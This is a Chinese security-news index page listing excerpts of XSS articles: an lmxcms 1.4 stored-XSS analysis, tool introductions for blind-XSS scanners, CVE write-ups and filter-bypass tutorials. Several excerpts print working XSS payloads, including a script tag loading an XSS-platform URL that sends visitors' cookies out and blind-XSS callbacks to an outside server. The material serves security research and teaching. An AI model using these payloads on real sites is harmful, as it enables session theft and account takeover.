记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华梦想v1.4 CMS平台XSS漏洞分析
一、背景介绍
梦想cms以下简称“lmxcms”,是由“10年”(网名)开发的一套简单实用的网站管理系统(cms)。它是完全免费和开源的。
漏洞类型:
存储型xss注入
漏洞描述:
在Lmxcms 1.4版本(目前最新版本)中,存在一处后台xss漏洞。Lmxcms未对编辑的产品内容进行过滤处理,从而导致漏洞发生。
受影响的系统版本:
LMXCMS <=V1.4
二、漏洞分析
通过黑盒测试,我们在后台管理员页面发现了一个存储型xss漏洞。该漏洞存在于admin.php页面的内容管理中的产品信息修改页面中
查看该点
尝试在该点进行xss注入
</textarea><sccript>alert(‘xss’)</script><textarea
存储型XSS的攻防:不想做开发的黑客不是好黑客
不想做开发的黑客不是好黑客。
本文只对存储型XSS进行分析。那么,什么是存储型XSS呢?
它是通过对网页注入可执行代码且成功地被浏览器执行,达到攻击的目的,一般是注入一段javascript脚本。在测试过程中,我们一般是使用:
<script>alert(1)</script>
通过这段js代码,弹个框来证明存在xss漏洞。那么,可能新手就会问了,弹个框有什么用呢?
其实,弹框只是为了证明存在此漏洞。而此漏洞的利用方式由很多种。
比如,你可以使用xss平台:
写入一段平台生成的xss脚本:
<script src=//xsspt.com/ZsgUBf></script>
当某人进入带有这个脚本的页面时,js脚本会获取他的cookie并发往xss平
发布时间:2019-11-17 12:20 |
阅读:3325 | 评论:0 |
标签:xss
BurpSuite自动化blind-xss插件:Femida-xss
Femida-xss (WIP)一款BurpSuite插件,用于自动化执行blind-xss盲搜索。它能够执行主动和被动检查。安装git clone https://github.com/wish-i-was/femida.gitBurp -> Extender -> Add -> find and select blind-xss.py使用首先,在名为“Your URL”的字段中设置回调URL,然后按Enter将其自动保存在config.py文件中。设置好之后,您需要用OOB-XSS向量填充Payloads表,以便扩展程序能够将您的Payloads注入到传出的请求中。请注意,您需要在Payloads中设置{URL}别名,因此扩展名将能够从“Your url”字段中获取数据并将其直接设置为Payloads。Fe
发布时间:2019-10-25 12:45 |
阅读:5946 | 评论:0 |
标签:xss
自动化的XSS漏洞扫描程序:Traxss
Traxss XSS扫描器一款自动化XSS漏洞扫描程序,用Python3编写,利用无头Selenium。Traxss是一个自动化框架,用于扫描URL和网页的XSS漏洞。它包括用于测试的575多个Payloads,以及用于增强测试健壮性的多个选项。Traxss XSS漏洞扫描器Traxss 安装与使用安装工具仓库git clone https://github.com/M4cs/traxss.git1git clone https://github.com/M4cs/traxss.git 依赖Traxss取决于Chromedriver。在MacOS上,可以使用homebrew命令安装:brew install cask chromedriver1brew install cask chromedriver 另外,
CVE-2019-16219: WordPress (Core)存储型XSS漏洞
漏洞概述WordPress是最主流的内容管理系统(CMS),占全球CMS市场份额的60.4%,远高于第二的Joomla!(5.2%)。因此,有超过1/3的网站使用WordPress。FortiGuard研究人员近期发现一个WordPress中的存储型XSS 0day漏洞。该0day漏洞是由于WordPress 5.0中新内置的Gutenberg引发的XSS漏洞。该编辑器没有超过过滤Shortcode错误消息中的JavaScript/HTML代码。因此,有Contributor或更高权限的远程攻击者就可以在访问被黑页面的受害者浏览器中执行任意JS/HTML代码。如果受害者有更高权限,比如administrator权限,攻
通过XSS窃取localStorage中的JWT
作者:{WXL}@ArkTeam原文作者:David Roccasalva原文题目:Stealing JWTs in localStorage via XSS原文来源:David Roccasalva’s blog “Stealing JWTs in localStorage via XSS”
由于很多现代应用程序都在使用JSON Web令牌(JWT)来管理用户会话,如果JWT发生泄露将会导致严重的后果。下面将简要介绍JWT的概念,以及作者的窃取示例以及JWT的保护措施。
什么是JSON Web令牌(JWT)?
简而言之,JWT是一个JSON Web令牌。这是一种系统对用户进行身份验证的简单方法,可以基于开源库很轻松的实现。因为JWT只是URL安全字符
B-XSSRF:用于检测和跟踪Blind XSS,XXE和SSRF的工具包
B-XSSRF介绍XSSRF是一个用于检测和跟踪Blind XSS,XXE和SSRF的工具包,基于php+mysql的WEB端程序,它拥有简洁漂亮的界面。B-XSSRF界面XSSRF安装下载源码git clone https://github.com/SpiderMate/B-XSSRF.git1git clone https://github.com/SpiderMate/B-XSSRF.git 将文件上传到您的服务器。创建一个数据库并将database.sql导入。更改db.php文件中的DB信息。准备好了。XSSRF使用BLIND XSS<embed src="http://mysite.com/bxssrf/request.php"><script src="http://mysite
发布时间:2019-08-29 17:45 |
阅读:21482 | 评论:0 |
标签:xss
知往鉴今:Chromium近三年UXSS漏洞分析及缓解、预防和检测措施
一、前言UXSS(通用跨站脚本攻击)是一种攻击方式,利用浏览器或浏览器扩展中的客户端漏洞,在访问任意资源(来源)时执行恶意代码(通常为JavaScript)。简而言之:受害者访问恶意网站(被攻陷/被感染)后,攻击者可以阅读受害者的Gmail内容、FaceBook上的私人消息,并可以代替受害者执行其他操作,例如发送电子邮件、上传照片等。本项研究的主要目的,是分析此前三年来(2014年至2017年)Chromium浏览器中实施的潜在缓解措施,并探索可用于预防或检测UXSS漏洞的新技术。二、背景SOP(同源策略)是Web应用程序安全模型中最为重要的概念之一。基本上,它可以防止不同来源互相访问存储在客户端上的数据(即:Cook
WordPress Social Warfare插件XSS和RCE漏洞分析(CVE-2019-9978)
一、概述3月21日,研究人员披露了Social Warfare中存在的两个漏洞,这是WordPress中一个非常受欢迎的插件,可以将社交网络分享按钮添加到网站或博客中。其中,一个是存储型跨站脚本攻击(XSS)漏洞,另一个是远程代码执行(RCE)漏洞,这两个漏洞共同获得CVE-2019-9978编号。在3.5.3版本之前所有版本的Social Warfare中都存在这两个漏洞。3月21日,发布了针对该漏洞的修复程序,但预计有42000个网站暂未更新至3.5.3版本,而存在漏洞。攻击者可以借助这些运动,运行任意PHP代码,在无需身份验证的情况下即可实现对网站和服务器的控制。攻击者可能会利用受感染的网站执行加密货币挖掘,或在
使用Sboxr自动发现和利用DOM(客户端)XSS漏洞
这一系列的博客文章将向你展示如何在单页或富JavaScript的应用程序上识别DOM XSS的问题。作为示例,我们将在DOM XSS playground(https://domgo.at)上解决10个练习题目,并为检测到的问题创建了简单的概念证明漏洞。这篇文章的内容涵盖了前两个练习的设置说明和解决方案。剩余的练习将在我们发布的其他文章中提到。我们还将发布一个gitbook,其中包含了Appsecco书籍门户网站上所有练习的解决方案。更新:gitbook会挂在我们的图书门户网站上—— https://appsecco.com/books/automating-discovery-and-exploiting-dom-c
影响1500万用户:Chrome扩展Video Downloader CSP绕过导致UXSS漏洞分析
概述在对各种Chrome扩展程序进行安全审查的过程中,我发现有两个流行的Chrome扩展程序Video Downloader(5.0.0.12版本,用户数量820万)和Video Downloader Plus(用户数量730万)在浏览器中存在跨站脚本(XSS)漏洞页面。攻击者只需让目标用户访问攻击者特制的页面,即可针对这些扩展实现漏洞利用。导致此漏洞的原因是,扩展程序使用字符串连接来构建HTML,该HTML通过jQuery动态附加到DOM。攻击者可以创建一个特制的链接,这将导致在扩展的上下文中执行任意JavaScript。利用该漏洞,攻击者可以滥用扩展程序可以访问的如下权限:"permissions&quo
Cisco ISE:从无需身份验证的XSS到高权限远程代码执行漏洞
一、漏洞概要我们发现,Cisco Identity Services Engine(ISE,身份服务引擎)存在3个漏洞,当这些漏洞被利用时,将允许未经身份验证的攻击者实现root权限并远程执行代码。第一个漏洞是存储型XSS文件上传漏洞,允许攻击者在受害者浏览器中上传并执行HTML页面。第二个是不安全的Flex AMF Java对象反序列化漏洞(CVE-2017-5641),该漏洞也是我们进行利用的漏洞。第三个是通过不正确的sudo文件权限实现权限提升,从而让本地攻击者以root身份运行代码。二、厂商响应Cisco已经为报告的XSS漏洞分配CVE-ID:CVE-2018-15440,并且在2019年1月9日发布了安全通告
XSS绕过filter高级技术part2
xss漏洞可能是最容易发现的漏洞,但是想要成功实现这种攻击的话,知道如何绕过filter是必须的。在part1中,我们已经探讨了几种绕过filter的技巧,比如利用属性和事件处理器来欺骗应用程序接受非正常的字符。现在,让我们来看看更多的绕过filter的技巧。现有的JavaScript和字符转义毋庸置疑,像JavaScript这样的脚本语言大大提升了web技术的功能,如客户端的高效处理,动态内容生成,还有一系列其他功能,让开发人员和用户都更加轻松。虽然这些功能带来了很多便利,但与此同时,也给黑客们带来了更多的攻击方法,尤其是xss漏洞。假设应用程序接收用户输入提交的字符串并通过JavaScript的方式来处理,如将字符
XSS绕过filter高级技术part1
在如今的web时代,XSS攻击十分常见,针对xss攻击的防御也有不少,Filter就是一种用来防御xss攻击的最常见的手段,filter通常是采用黑名单的形式或者基于正则表达式来过滤。尽管如此,依然有很多技术可以用来绕过Filter。基本变形我们可以先从绕过相对简单的filter开始。根据Filter过滤规则复杂度的不同,绕过的难易程度肯定也不同,这些简单的过滤器还是比较容易绕过的,只要做一些基本的变形即可。我们用到的大部分技术都是测试XSS漏洞的最简单的payload的变形,就像下面的代码一样。<script>alert(1)</script>如果测试的参数存在xss,就会弹框显示1.Filt
XSS有长度限制?试试这几招
在某些情况下,你可以执行JavaScript代码,但是却只能使用alert,因为它对字符输入长度做了限制。我最近看了一篇hackerone的报告,情况完全相同,所以我决定写这篇文章。报告作者能够成功执行任意JavaScript脚本,不过他的payload有些复杂,而且需要用户交互,光凭这一点,就极大的降低了漏洞的严重性,而且毫无疑问,漏洞成效也会大打折扣。我个人认为,更好的POC是从攻击者控制的域中加载外部JavaScript脚本。本文列出了几种调用外部JavaScript脚本的方法,并且使用尽可能少的字符。假如我们的payload输出在href属性内,并且限制输入32个字符。<a href="
iOS漏洞——Web View XSS
本文介绍一个简单的,但是潜在危险性特别大、而且在iOS app中经常出现的安全漏洞。该漏洞非常简单,但是常常被误解,当开发者在代码中是设置webView时,经常会看到:[webView loadHTMLString:someHTMLstring baseURL:[NSURL URLWithString:@""]]许多开发者都认为设置baseURL为@””,表示是安全的,因为baseurl被指定为空字符串,攻击者也不能加载请求到随机的恶意网站。但事实上不是这样的。当baseURL被设置为空字符串时,攻击者可以绕过SOP保护访问APP的文件系统(使用file:// url方
公告
关注公众号hackdig,学习最新黑客技术